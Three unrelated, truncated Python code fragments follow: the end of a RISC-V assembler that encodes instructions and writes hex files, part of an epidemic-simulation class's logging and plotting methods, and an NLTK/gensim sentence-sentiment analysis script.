once we have AUIPC support else: raise Exception("Invalid number of args for \"lhu\"") instructionFields["funct3"] = 5 instructionFields["rd"] = args[0] instructionFields["opcode"] = 3 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.LB): instructionFields = {} instructionFields["type"] = "I" if (len(args) == 3): instructionFields["imm"] = args[1] instructionFields["rs1"] = args[2] elif (len(args) == 2): instructionFields["imm"] = args[1] instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support else: raise Exception("Invalid number of args for \"lb\"") instructionFields["funct3"] = 0 instructionFields["rd"] = args[0] instructionFields["opcode"] = 3 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.LBU): instructionFields = {} instructionFields["type"] = "I" if (len(args) == 3): instructionFields["imm"] = args[1] instructionFields["rs1"] = args[2] elif (len(args) == 2): instructionFields["imm"] = args[1] instructionFields["rs1"] = 0 #<TODO> fix this once we have AUIPC support else: raise Exception("Invalid number of args for \"lbu\"") instructionFields["funct3"] = 4 instructionFields["rd"] = args[0] instructionFields["opcode"] = 3 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SW): instructionFields = {} instructionFields["type"] = "S" instructionFields["imm"] = args[1] instructionFields["rs2"] = args[0] instructionFields["rs1"] = args[2] instructionFields["funct3"] = 2 instructionFields["opcode"] = 35 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SH): instructionFields = {} instructionFields["type"] = "S" instructionFields["imm"] = args[1] instructionFields["rs2"] = args[0] instructionFields["rs1"] = args[2] instructionFields["funct3"] = 1 instructionFields["opcode"] = 35 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.SB): instructionFields = {} instructionFields["type"] = "S" instructionFields["imm"] = args[1] instructionFields["rs2"] = args[0] instructionFields["rs1"] = args[2] instructionFields["funct3"] = 0 instructionFields["opcode"] = 35 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.LUI): instructionFields = {} instructionFields["type"] = "U" instructionFields["rd"] = args[0] instructionFields["imm"] = args[1] instructionFields["opcode"] = 55 subInstructionFields.append(instructionFields) elif (instructionEnum == INST.LA): #Pseudo instruction: la rd, SYMBOL = auipc rd, delta[31:12] + delta[11]; addi rd, rd, delta[11:0] #Determine delta segments (see page 139 of riscv-spec.pdf) delta = args[1] - programCounter delta_31_12 = int(delta/4096) delta_11 = int((delta-(delta_31_12*4096))/2048) delta_11_0 = delta%4096 upperValue = delta_31_12 + delta_11 lowerValue = delta_11_0 #Generate intruction field dicts auipcFields = {} auipcFields["type"] = "U" auipcFields["rd"] = args[0] auipcFields["imm"] = upperValue auipcFields["opcode"] = 23 subInstructionFields.append(auipcFields) addiFields = {} addiFields["type"] = "I" addiFields["imm"] = lowerValue addiFields["rs1"] = args[0] addiFields["funct3"] = 0 addiFields["rd"] = args[0] addiFields["opcode"] = 19 subInstructionFields.append(addiFields) ######### # Concatenate instruction fields into binary strings ######### for instructionFieldDict in subInstructionFields: binaryString = "" #R-type instructions if (instructionFieldDict["type"] == "R"): funct7_string = format(instructionFieldDict["funct7"], "07b") #7bit value rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value rd_string = format(instructionFieldDict["rd"], "05b") #5bit value opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value binaryString = "{}{}{}{}{}{}".format(funct7_string, rs2_string, rs1_string, funct3_string, rd_string, opcode_string) #I-type instructions elif (instructionFieldDict["type"] == "I"): imm_string = "" if (instructionFieldDict["imm"] < 0): #handle negative immediate arguments absVal = instructionFieldDict["imm"] * -1 absBinString = format(absVal, "012b") #get binary string of abs value #Convert to 2s compliment negative number flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits unsignedVal = int(flippedBitsString, 2) twoCompInt = unsignedVal + 1 imm_string = format(twoCompInt, "012b") else: imm_string = format(instructionFieldDict["imm"], "012b") #12bit value rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value rd_string = format(instructionFieldDict["rd"], "05b") #5bit value opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value binaryString = "{}{}{}{}{}".format(imm_string, rs1_string, funct3_string, rd_string, opcode_string) #J-type instructions elif (instructionFieldDict["type"] == "J"): imm_string = "" if (instructionFieldDict["imm"] < 0): #handle negative immediate arguments absVal = instructionFieldDict["imm"] * -1 absBinString = format(absVal, "021b") #get binary string of abs value #Convert to 2s compliment negative number flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits unsignedVal = int(flippedBitsString, 2) twoCompInt = unsignedVal + 1 imm_string = format(twoCompInt, "021b") else: imm_string = format(instructionFieldDict["imm"], "021b") #12bit value imm_stringReordered = "{}{}{}{}".format(imm_string[-21], imm_string[-11:-1], imm_string[-12], imm_string[-20:-12]) #Rearrange imm_stringOrdered to fit J-type bit index format [20|10:1|11|19:12] rd_string = format(instructionFieldDict["rd"], "05b") #5bit value opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value binaryString = "{}{}{}".format(imm_stringReordered, rd_string, opcode_string) #B-type instructions elif (instructionFieldDict["type"] == "B"): imm_string = "" if (instructionFieldDict["imm"] < 0): #handle negative immediate arguments absVal = instructionFieldDict["imm"] * -1 absBinString = format(absVal, "013b") #get binary string of abs value #Convert to 2s compliment negative number flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits unsignedVal = int(flippedBitsString, 2) twoCompInt = unsignedVal + 1 imm_string = format(twoCompInt, "013b") else: imm_string = format(instructionFieldDict["imm"], "013b") #12bit value #Split imm_string into required parts for B-type immString_12 = imm_string[-13] immString_10_5 = imm_string[-11:-5] immString_4_1 = imm_string[-5:-1] immString_11 = imm_string[-12] rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value binaryString = "{}{}{}{}{}{}{}{}".format(immString_12, immString_10_5, rs2_string, rs1_string, funct3_string, immString_4_1, immString_11, opcode_string) #S-type instructions elif (instructionFieldDict["type"] == "S"): imm_string = "" if (instructionFieldDict["imm"] < 0): #handle negative immediate arguments absVal = instructionFieldDict["imm"] * -1 absBinString = format(absVal, "013b") #get binary string of abs value #Convert to 2s compliment negative number flippedBitsString = absBinString.replace("0","z").replace("1","0").replace("z","1") #Flip all bits unsignedVal = int(flippedBitsString, 2) twoCompInt = unsignedVal + 1 imm_string = format(twoCompInt, "013b") else: imm_string = format(instructionFieldDict["imm"], "013b") #12bit value #Split imm_string into required parts for S-type immString_11_5 = imm_string[-12:-5] immString_4_0 = imm_string[-5:] rs2_string = format(instructionFieldDict["rs2"], "05b") #5bit value rs1_string = format(instructionFieldDict["rs1"], "05b") #5bit value funct3_string = format(instructionFieldDict["funct3"], "03b") #3bit value opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value binaryString = "{}{}{}{}{}{}".format(immString_11_5, rs2_string, rs1_string, funct3_string, immString_4_0, opcode_string) #U-type instructions elif (instructionFieldDict["type"] == "U"): imm_string = "" if (instructionFieldDict["imm"] < 0): raise Exception("Negative immediate used in U type instruction | {}".format(instructionFieldDict["imm"])) else: imm_string = format(instructionFieldDict["imm"], "020b") #20bit value rd_string = format(instructionFieldDict["rd"], "05b") #5bit value opcode_string = format(instructionFieldDict["opcode"], "07b") #7bit value binaryString = "{}{}{}".format(imm_string, rd_string, opcode_string) else: raise Exception("Unsupported instruction type {}".format(instruction)) #Convert binary instruction string to int and store in list instructionValues.append(int(binaryString, 2)) #Iterate programCounter programCounter += 4 except Exception as e: errorMessage = "" errorMessage += "PC = {}\n".format(programCounter) errorMessage += "INST = {}\n\n".format(instruction) errorMessage += traceback.format_exc() printColor(errorMessage, color=COLORS.ERROR) sys.exit() return instructionValues def writeLogisimHexFile(integerList, filepath): ''' Write a list of integers into a Logisim hex file ''' outputFile = open(filepath, "w") outputFile.write("v2.0 raw\n") for val in integerList: outputFile.write(hex(val)[2:]) outputFile.write("\n") outputFile.close() def writeHexFile(integerList, filepath): ''' Write a list of integers into a hex file ''' outputFile = open(filepath, "w") for val in integerList: hexVal = hex(val)[2:].zfill(8) outputFile.write(hexVal) outputFile.write("\n") outputFile.close() def generateCsvIndex(instructions, instructionIntValues, filepath): ''' Will generate a csv index for each instruction ''' indexDict = { "ProgramCounter": [], "instruction": [], "DEC": [], "HEX": [], "BIN": [] } for address in range(0, len(instructions)): intructionStr = str(instructions[address]) intValue = instructionIntValues[address] hexValue = hex(intValue) binValue = format(intValue, "032b") indexDict["ProgramCounter"].append(address*4) indexDict["instruction"].append(intructionStr) indexDict["DEC"].append(intValue) indexDict["HEX"].append(hexValue) indexDict["BIN"].append(binValue) df = pd.DataFrame(indexDict) df.to_csv(filepath, index=False) return df def main(asmPath, hexPathArg, indexPath, logisim, debuggerAnnotations): try: #Convert asm file to machine code instructions, linedInstructions, initializedData = parseAssemblyFile(asmPath) programIntValues = instructionsToInts(instructions) programIntValues.append(0) programIntValues += [dataDef.value for dataDef in initializedData] outputPath = asmPath.replace(".asm", "") + ".hex" if (hexPathArg): outputPath = hexPathArg if (logisim): outputPath = outputPath.replace(".hex", "_logisim.hex") writeLogisimHexFile(programIntValues, outputPath) else: writeHexFile(programIntValues, outputPath) if (indexPath): generateCsvIndex(instructions, programIntValues, indexPath) #Add assembly annotations to debuugerAnnotations dict debuggerAnnotations["asmFileMap"] = {} offset = 0 #keep track of offset for multi-inst pseudoinstructions multiPseudoInstructions = [INST.LA] for index in range(0, len(linedInstructions)): #instruction tuple = [<lineNumber>, [<instruction_enum>,<arg1>,<arg2>,...]] programCounter = (index+offset)*4 debuggerAnnotations["asmFileMap"][programCounter] = {} debuggerAnnotations["asmFileMap"][programCounter]["lineNum"] = linedInstructions[index][0] debuggerAnnotations["asmFileMap"][programCounter]["file"] = os.path.abspath(asmPath) if (linedInstructions[index][1][0] in multiPseudoInstructions): offset += 1 annotationFile = open("{}_annotation.json".format(asmPath.replace(".asm", "")), "w") annotationFile.write(utils.dictToJson(debuggerAnnotations)) annotationFile.close() #Print finished message printColor("\nDone!", color=COLORS.OKGREEN) print("{} total instructions".format(len(programIntValues)-1)) addressBits = math.log(len(programIntValues),2) if (logisim and (addressBits > 24)): printColor ("WARNING: Program
data structures and scenario flags: self.update_parameters() # Update the next checkpoint time: checkpointIdx = numpy.searchsorted(checkpoints['t'], self.t) # Finds 1st index in list greater than given val if (checkpointIdx >= numCheckpoints): # We are out of checkpoints, stop checking them: checkpoints = None else: checkpointTime = checkpoints['t'][checkpointIdx] # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # print(f"t={self.t}, period ={self.period}") if numpy.any(self.p_periodic) \ and (self.period > 0) \ and (int(self.t / self.period) > lastTestInterval): if verbose: print(f"periodic testing t={self.t}") self.periodic_test(self.p_periodic) lastTestInterval = int(self.t / self.period) if self.has_policy and (not policyInterval or (int(self.t / policyInterval) > lastPolicyInterval)): lastPolicyInterval = int(self.t / policyInterval) if (verbose): print(f"t={self.t}, Applying policy") self.policy() # self.update_parameters() if self.numD_E[self.tidx] + self.numD_I[self.tidx]: if not self.time_detected: self.time_detected = self.tidx if stopping == "1st": if self.numD_I[self.tidx] + self.numD_E[self.tidx]: self.finalize_data_series() running = False runTillEnd = False elif stopping and stopping(self): self.finalize_data_series() running = False runTillEnd = False # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (print_interval): if (print_reset and (int(self.t) % print_interval == 0)): if (verbose == "t"): print("t = %.2f" % self.t) if (verbose == True): print("t = %.2f" % self.t) print("\t S = " + str(self.numS[self.tidx])) print("\t E = " + str(self.numE[self.tidx])) print("\t I = " + str(self.numI[self.tidx])) print("\t D_E = " + str(self.numD_E[self.tidx])) print("\t D_I = " + str(self.numD_I[self.tidx])) print("\t R = " + str(self.numR[self.tidx])) print("\t F = " + str(self.numF[self.tidx])) print_reset = False elif (not print_reset and (int(self.t) % 10 != 0)): print_reset = True # end of while loop if not self.time_detected: self.time_detected = self.tidx if (verbose): print(f"Finished execution at {self.t}") print( f"percentage of population tested / day: {100 * numpy.sum(self.numTested) / (self.numNodes * self.t):.3f}%") totscale = 1 finscale = 1 # 100.0/(self.numNodes) log = {} for k, v in self.init_parameters.items(): if isinstance(v, dict): for a, b in v.items(): log[f"{k}_{a}"] = b else: if isinstance(v, (list, numpy.ndarray)): v = "list/array" log[k] = v temp = numpy.roll(self.tseries, 1) temp[0] = 0 lengths = self.tseries - temp log.update( {"type": type, "variant": variant, "checkpoints": checkpoints, "policy": self.has_policy, "policy interval": policyInterval, "stopping": stopping, "t": self.t, "totS": numpy.sum(self.numS * lengths), "totE": numpy.sum(self.numE * lengths), "totI": numpy.sum(self.numI * lengths), "totD_E": numpy.sum(self.numD_E * lengths), "totD_I": numpy.sum(self.numD_I * lengths), "totE_tillFirst": numpy.sum(self.numE[:self.time_detected + 1] * lengths[:self.time_detected + 1]), "totI_tillFirst": numpy.sum(self.numI[:self.time_detected + 1] * lengths[:self.time_detected + 1]), "totR": numpy.sum(self.numR * lengths), "tit": numpy.sum(self.numF * lengths), "totTests": numpy.sum(self.numTested), "totTests1st": numpy.sum(self.numTested[:self.time_detected + 1]), "meanTests1st": numpy.sum(self.numTested[:self.time_detected + 1]) / self.tseries[ self.time_detected] if self.time_detected else 0, "totPositive": numpy.sum(self.numPositive), "finS": self.numS[self.tidx] * finscale, "finE": self.numE[self.tidx] * finscale, "finI": self.numI[self.tidx] * finscale, "finD_E": self.numD_E[self.tidx] * finscale, "finD_I": self.numD_I[self.tidx] * finscale, "finR": self.numR[self.tidx] * finscale, "finF": self.numF[self.tidx] * finscale, "note": f"Finals scaled by {finscale:.5f}. Averages per time period", "time1st": self.tseries[self.time_detected] }) if (self.nodeGroupData): for groupName in self.nodeGroupData: log.update({ f"{groupName}_totS": numpy.sum(self.nodeGroupData[groupName]['numS'] * lengths), f"{groupName}_totE": numpy.sum(self.nodeGroupData[groupName]['numE'] * lengths), f"{groupName}_totI": numpy.sum(self.nodeGroupData[groupName]['numI'] * lengths), f"{groupName}_totD_E": numpy.sum(self.nodeGroupData[groupName]['numD_E'] * lengths), f"{groupName}_totD_I": numpy.sum(self.nodeGroupData[groupName]['numD_I'] * lengths), f"{groupName}_totE_tillFirst": numpy.sum( self.nodeGroupData[groupName]['numE'][:self.time_detected + 1] * lengths[ :self.time_detected + 1]), f"{groupName}_totI_tillFirst": numpy.sum( self.nodeGroupData[groupName]['numI'][:self.time_detected + 1] * lengths[ :self.time_detected + 1]), f"{groupName}_totR": numpy.sum(self.nodeGroupData[groupName]['numR'] * lengths), f"{groupName}_totTests": numpy.sum(self.nodeGroupData[groupName]['numTested']), f"{groupName}_totTests1st": numpy.sum( self.nodeGroupData[groupName]['numTested'][:self.time_detected + 1]), f"{groupName}_meanTests1st": numpy.sum( self.nodeGroupData[groupName]['numTested'][:self.time_detected + 1]) / self.tseries[ self.time_detected] if self.time_detected else 0, f"{groupName}_finS": self.nodeGroupData[groupName]['numS'][self.tidx] * finscale, f"{groupName}_finE": self.nodeGroupData[groupName]['numE'][self.tidx] * finscale, f"{groupName}_finI": self.nodeGroupData[groupName]['numI'][self.tidx] * finscale, f"{groupName}_finD_E": self.nodeGroupData[groupName]['numD_E'][self.tidx] * finscale, f"{groupName}_finD_I": self.nodeGroupData[groupName]['numD_I'][self.tidx] * finscale, f"{groupName}_finR": self.nodeGroupData[groupName]['numR'][self.tidx] * finscale, f"{groupName}_finF": self.nodeGroupData[groupName]['numF'][self.tidx] * finscale, }) log.update({ f"{groupName}_undetected1st": self.nodeGroupData[groupName]['numE'][self.time_detected] + self.nodeGroupData[groupName]['numI'][self.time_detected], f"{groupName}_infected1st": self.nodeGroupData[groupName]['numE'][self.time_detected] + self.nodeGroupData[groupName]['numI'][self.time_detected] + self.nodeGroupData[groupName]['numD_E'][self.time_detected] + self.nodeGroupData[groupName]['numD_I'][self.time_detected], f"{groupName}_totUndetected1st": log[f"{groupName}_totE_tillFirst"] + log[ f"{groupName}_totI_tillFirst"], f"{groupName}_meanUndetected1st": (log[f"{groupName}_totE_tillFirst"] + log[ f"{groupName}_totI_tillFirst"]) / self.tseries[self.time_detected] if self.time_detected else 0 }) time1st = self.tseries[self.time_detected] log.update({ "totInfected": log["totE"] + log["totI"] + log["totD_E"] + log["totD_I"], "maxInfected": numpy.max(self.numE + self.numI + self.numD_E + self.numD_I), "finInfected": log["finE"] + log["finI"] + log["finD_E"] + log["finD_I"], "totUndetected": log["totE"] + log["totI"], "meanUndetectedInfectiousDays": log["totI"] / self.t, "meanUndetected": (log["totE"] + log["totI"]) / self.t, "undetected1st": self.numE[self.time_detected] + self.numI[self.time_detected], "infected1st": self.numE[self.time_detected] + self.numI[self.time_detected] + self.numD_E[ self.time_detected] + self.numD_I[self.time_detected], "totUndetected1st": log["totE_tillFirst"] + log["totI_tillFirst"], "meanUndetected1st": (log["totE_tillFirst"] + log["totI_tillFirst"]) / self.tseries[ self.time_detected] if self.time_detected else 0, "meanTests": log["totTests"] / self.t, "finUndetected": log["finE"] + log["finI"], "overall_infected": self.numNodes - log["finS"]}) # compute baseline risk if the workplace was closed. mean_p_extern = numpy.mean(self.p_extern) if isinstance(self.p_extern, (list, numpy.ndarray)) else self.p_extern gamma = numpy.mean(self.gamma) if isinstance(self.gamma, (list, numpy.ndarray)) else self.gamma base_risk = mean_p_extern / gamma log["excessRisk"] = 100 * (log["totI"] / (self.t * self.numNodes) - base_risk) / base_risk if base_risk else 0 return log # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ def plot(self, ax=None, plot_S='line', plot_E='line', plot_I='line', plot_R='line', plot_F='line', plot_D_E='line', plot_D_I='line', combine_D=True, color_S='tab:green', color_E='orange', color_I='crimson', color_R='tab:blue', color_F='black', color_D_E='mediumorchid', color_D_I='mediumorchid', color_reference='#E0E0E0', dashed_reference_results=None, dashed_reference_label='reference', shaded_reference_results=None, shaded_reference_label='reference', vlines=[], vline_colors=[], vline_styles=[], vline_labels=[], ylim=None, xlim=None, legend=True, title=None, side_title=None, plot_percentages=True, plot_tested=True): import matplotlib.pyplot as pyplot # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Create an Axes object if None provided: # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (not ax): fig, ax = pyplot.subplots() # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Prepare data series to be plotted: # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Fseries = self.numF / self.numNodes if plot_percentages else self.numF Eseries = self.numE / self.numNodes if plot_percentages else self.numE Dseries = (self.numD_E + self.numD_I) / self.numNodes if plot_percentages else (self.numD_E + self.numD_I) D_Eseries = self.numD_E / self.numNodes if plot_percentages else self.numD_E D_Iseries = self.numD_I / self.numNodes if plot_percentages else self.numD_I Iseries = self.numI / self.numNodes if plot_percentages else self.numI Rseries = self.numR / self.numNodes if plot_percentages else self.numR Sseries = self.numS / self.numNodes if plot_percentages else self.numS Testseries = self.numTested / self.numNodes if plot_percentages else self.numTested # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # Draw tested fraction # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (plot_tested): # average over 3 days # temp = [0] * (int(self.t/3) +2) # for id in range(self.tidx): # temp[int(self.tseries[id]/3)] += Testseries[id] # for id in range(self.tidx): # Testseries[id] = temp[int(self.tseries[id]/3)]/3 # ax.plot(self.tseries, Testseries,color='grey', linestyle='--', label ='tested', zorder=1) ax.fill_between(numpy.ma.masked_where(Testseries <= 0, self.tseries), numpy.ma.masked_where(Testseries <= 0, Testseries), color='grey', label='tested', alpha=0.4, zorder=4) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Draw the reference data: # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ if (dashed_reference_results): dashedReference_tseries = dashed_reference_results.tseries[::int(self.numNodes / 100)] dashedReference_IDEstack = ( dashed_reference_results.numI + dashed_reference_results.numD_I + dashed_reference_results.numD_E + dashed_reference_results.numE)[ ::int(self.numNodes / 100)] / (self.numNodes if plot_percentages else 1) ax.plot(dashedReference_tseries, dashedReference_IDEstack, color='#E0E0E0', linestyle='--', label='$I+D+E$ (' + dashed_reference_label + ')', zorder=0) if (shaded_reference_results): shadedReference_tseries = shaded_reference_results.tseries shadedReference_IDEstack = ( shaded_reference_results.numI + shaded_reference_results.numD_I + shaded_reference_results.numD_E + shaded_reference_results.numE) / ( self.numNodes if plot_percentages else 1) ax.fill_between(shaded_reference_results.tseries, shadedReference_IDEstack, 0, color='#EFEFEF', label='$I+D+E$ (' + shaded_reference_label + ')', zorder=0) ax.plot(shaded_reference_results.tseries, shadedReference_IDEstack, color='#E0E0E0', zorder=1) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Draw the stacked variables: # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ topstack = numpy.zeros_like(self.tseries) if (any(Fseries) and plot_F == 'stacked'): ax.fill_between(numpy.ma.masked_where(Fseries <= 0, self.tseries), numpy.ma.masked_where(Fseries <= 0, topstack + Fseries), topstack, color=color_F, alpha=0.5, label='$F$', zorder=2) ax.plot(numpy.ma.masked_where(Fseries <= 0, self.tseries), numpy.ma.masked_where(Fseries <= 0, topstack + Fseries), color=color_F, zorder=3) topstack = topstack + Fseries if (any(Eseries) and plot_E == 'stacked'): ax.fill_between(numpy.ma.masked_where(Eseries <= 0, self.tseries), numpy.ma.masked_where(Eseries <= 0, topstack + Eseries), topstack, color=color_E, alpha=0.5, label='$E$', zorder=2) ax.plot(numpy.ma.masked_where(Eseries <= 0, self.tseries), numpy.ma.masked_where(Eseries <= 0, topstack + Eseries), color=color_E, zorder=3) topstack = topstack + Eseries if (combine_D and plot_D_E == 'stacked' and plot_D_I == 'stacked'): ax.fill_between(numpy.ma.masked_where(Dseries <= 0, self.tseries), numpy.ma.masked_where(Dseries <= 0, topstack + Dseries), topstack, color=color_D_E, alpha=0.5, label='$D_{all}$', zorder=2) ax.plot(numpy.ma.masked_where(Dseries <= 0, self.tseries), numpy.ma.masked_where(Dseries <= 0, topstack + Dseries), color=color_D_E, zorder=3) topstack = topstack + Dseries else: if (any(D_Eseries) and plot_D_E == 'stacked'): ax.fill_between(numpy.ma.masked_where(D_Eseries <= 0, self.tseries), numpy.ma.masked_where(D_Eseries <= 0, topstack + D_Eseries), topstack, color=color_D_E, alpha=0.5, label='$D_E$', zorder=2) ax.plot(numpy.ma.masked_where(D_Eseries <= 0, self.tseries), numpy.ma.masked_where(D_Eseries <= 0, topstack + D_Eseries), color=color_D_E, zorder=3) topstack = topstack + D_Eseries if (any(D_Iseries) and plot_D_I == 'stacked'): ax.fill_between(numpy.ma.masked_where(D_Iseries <= 0, self.tseries), numpy.ma.masked_where(D_Iseries <= 0, topstack + D_Iseries), topstack, color=color_D_I, alpha=0.5, label='$D_I$', zorder=2) ax.plot(numpy.ma.masked_where(D_Iseries <= 0, self.tseries), numpy.ma.masked_where(D_Iseries <= 0, topstack + D_Iseries), color=color_D_I, zorder=3) topstack = topstack + D_Iseries if (any(Iseries) and plot_I == 'stacked'): ax.fill_between(numpy.ma.masked_where(Iseries <= 0, self.tseries), numpy.ma.masked_where(Iseries <= 0, topstack + Iseries), topstack, color=color_I, alpha=0.5, label='$I$', zorder=2) ax.plot(numpy.ma.masked_where(Iseries <= 0, self.tseries), numpy.ma.masked_where(Iseries <= 0, topstack + Iseries), color=color_I, zorder=3) topstack = topstack + Iseries if (any(Rseries) and plot_R == 'stacked'): ax.fill_between(numpy.ma.masked_where(Rseries <= 0, self.tseries), numpy.ma.masked_where(Rseries <= 0, topstack + Rseries), topstack, color=color_R, alpha=0.5, label='$R$', zorder=2) ax.plot(numpy.ma.masked_where(Rseries <= 0, self.tseries), numpy.ma.masked_where(Rseries <= 0, topstack + Rseries), color=color_R, zorder=3) topstack = topstack + Rseries if (any(Sseries) and plot_S == 'stacked'): ax.fill_between(numpy.ma.masked_where(Sseries <= 0, self.tseries), numpy.ma.masked_where(Sseries <=
<gh_stars>0 # -*- coding: utf-8 -*- """ Created on Mon Nov 11 13:41:14 2019 @author: Emmett & Binyang """ from pprint import pprint import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns from nltk.tokenize.punkt import PunktSentenceTokenizer, PunktTrainer ##Let’s first build a corpus to train our tokenizer on. We’ll use stuff available in NLTK: from nltk.corpus import gutenberg # print (dir(gutenberg)) # print (gutenberg.fileids()) text = "" for file_id in gutenberg.fileids(): text += gutenberg.raw(file_id) print (len(text)) ##a funtion that converts a list to a string def listToString(s): # initialize an empty string str1 = "" # traverse in the string for ele in s: str1 += ele # return string return str1 ##extract sentences from samples for following sentiment analysis sampNum = 1 sent_df = pd.DataFrame() i = 0 while (sampNum < 186): fileOpen = open("sample"+str(sampNum)+".txt","r") temp = fileOpen.readlines() temp = listToString(temp) trainer = PunktTrainer() trainer.INCLUDE_ALL_COLLOCS = True trainer.train(text) tokenizer = PunktSentenceTokenizer(trainer.get_params()) ##Adding more abbreviations tokenizer._params.abbrev_types.add('dr') sent = tokenizer.tokenize(temp) for sent in sent: sent_df.loc[i, 'sent'] = sent sent_df.loc[i, 'sample'] = sampNum i += 1 sampNum += 1 ##NLTK’s built-in Vader Sentiment Analyzer will simply rank a piece of text as positive, negative or neutral ##using a lexicon of positive and negative words. ##We can utilize this tool by first creating a Sentiment Intensity Analyzer (SIA) to categorize our headlines, ##then we'll use the polarity_scores method to get the sentiment. ##We'll append each sentiment dictionary to a results list, which we'll transform into a dataframe: from nltk.sentiment.vader import SentimentIntensityAnalyzer as SIA sia = SIA() results = [] for idx, row in sent_df.iterrows(): line = row['sent'] score = sia.polarity_scores(line) sent_df.loc[idx, 'neg'] = score.get('neg') sent_df.loc[idx, 'neu'] = score.get('neu') sent_df.loc[idx, 'pos'] = score.get('pos') sent_df.loc[idx, 'compound'] = score.get('compound') # pprint(results[:10], width=100) ##We will consider posts with a compound value greater than 0.2 as positive and less than -0.2 as negative. ##There's some testing and experimentation that goes with choosing these ranges, and there is a trade-off to be ##made here. If you choose a higher value, you might get more compact results (less false positives and false ##negatives), but the size of the results will decrease significantly. sent_df['label'] = 0 sent_df.loc[sent_df['compound'] > 0.3, 'label'] = 1 sent_df.loc[sent_df['compound'] < -0.3, 'label'] = -1 # sent_df.head() ##We have all the data we need to save, so let's do that: sent_df.to_csv('sentiment analysis.csv', mode='a', encoding='utf-8', index=False) ##We can now keep appending to this csv, but just make sure that if you reassign the headlines set, you could get ##duplicates. Maybe add a more advanced saving function that reads and removes duplicates before saving. #Let's first take a peak at a few positive and negative headlines: print("Positive headlines:\n") pprint(list(sent_df[sent_df['label'] == 1].sent)[:5], width=200) print("\nNegative headlines:\n") pprint(list(sent_df[sent_df['label'] == -1].sent)[:5], width=200) ##Now let's check how many total positives and negatives we have in this dataset: print(sent_df.label.value_counts()) print(sent_df.label.value_counts(normalize=True) * 100) ##The first line gives us raw value counts of the labels, whereas the second line provides percentages ##with the normalize keyword. ##For fun, let's plot a bar chart: """ fig, ax = plt.subplots(figsize=(8, 8)) counts = sent_df.label.value_counts(normalize=True) * 100 sns.barplot(x=counts.index, y=counts, ax=ax) ax.set_xticklabels(['Negative', 'Neutral', 'Positive']) ax.set_ylabel("Percentage") plt.show() """ ##filter the sentences by number of words in it for idx, row in sent_df.iterrows(): sentence = row['sent'] sent_df.loc[idx, 'len_sent'] = len(sentence.split()) ##split positive and other sentences pos = sent_df[sent_df['label'] == 1] neg = sent_df[sent_df['label'] != 1] import gensim from gensim.parsing.preprocessing import strip_non_alphanum from gensim.parsing.preprocessing import strip_punctuation from gensim.parsing.preprocessing import strip_multiple_whitespaces from gensim.parsing.preprocessing import stem_text corpus_full = [] for idx, row in sent_df.iterrows(): temp = row['sent'] temp1 = strip_non_alphanum(str(temp)) temp2 = strip_punctuation(temp1) temp3 = strip_multiple_whitespaces(temp2) final = stem_text(temp3) corpus_full.append(final) corpus_pos = [] for idx, row in pos.iterrows(): temp = row['sent'] temp1 = strip_non_alphanum(str(temp)) temp2 = strip_punctuation(temp1) temp3 = strip_multiple_whitespaces(temp2) final = stem_text(temp3) corpus_pos.append(final) corpus_neg = [] for idx, row in neg.iterrows(): temp = row['sent'] temp1 = strip_non_alphanum(str(temp)) temp2 = strip_punctuation(temp1) temp3 = strip_multiple_whitespaces(temp2) final = stem_text(temp3) corpus_neg.append(final) from nltk.corpus import stopwords stop_words = stopwords.words('english') stoplist = set('a about above after again against all am an and any are arent\ as also at be because been before being below between both but\ by cant cannot could couldnt did didnt do does doesnt doing dont\ down during each els few for from further had hadnt has have havent\ having he hed hes her here heres hers herself him himself his\ how hows i id ill im ive if in into is isnt it its itself lets\ me more most mustnt my myself no nor not of off on once only or\ other ought our ours ourselves out over own same shant she shes\ should shouldnt so some such than that thats the their theirs\ them themselves then there theres these they theyd theyll theyre\ theyve this those through to too under until up very was wasnt\ we wed were weve were werent what whats when whens which while\ who whos whom why whys with wont would wouldnt you youd youll\ youre youve your yours yourself yourselves ll ve s ar mayb ha re\ us thi isn a b c d e f g h i j k l m n o p q r s t u v w x y z\ hi will can get back go don wa let atc ok ani mi thei whenev 